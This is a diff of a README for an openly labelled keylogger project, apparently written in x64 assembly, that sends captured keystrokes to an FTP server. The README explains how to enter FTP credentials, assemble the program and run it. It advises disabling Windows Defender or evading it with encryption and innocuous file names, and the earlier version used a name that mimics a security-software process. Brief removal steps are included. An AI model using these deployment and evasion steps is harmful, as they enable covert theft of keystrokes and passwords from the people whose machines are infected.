andrew-canafe/miniftp-keylogger/README.md

 ## How to use:
 You may first need to [temporarily disable Windows Defender](https://github.com/andrewcanafe/Mini-FTP-Keylogger/blob/master/README.md#how-to-temporarily-disable-windows-defender).
 However, this can be bypassed by using dynamic encryption tools, renaming the file to a less suspicious name, etc. Running a newer version of the keylogger will automatically overwrite an older version, and vice versa.
 1. Open miniftpkeylogger.asm and edit the username, password, and server name fields
-2. Assemble using MASM64 to create ccsvchst.exe
+2. Assemble using MASM64 to create miniftp.exe
-3. Use ccsvchst.exe (malware) at your own risk
+3. Use miniftp.exe (malware) at your own risk

 ## How to safely remove:
 1. Open up Task Manager > Find ccsvchst.exe and end task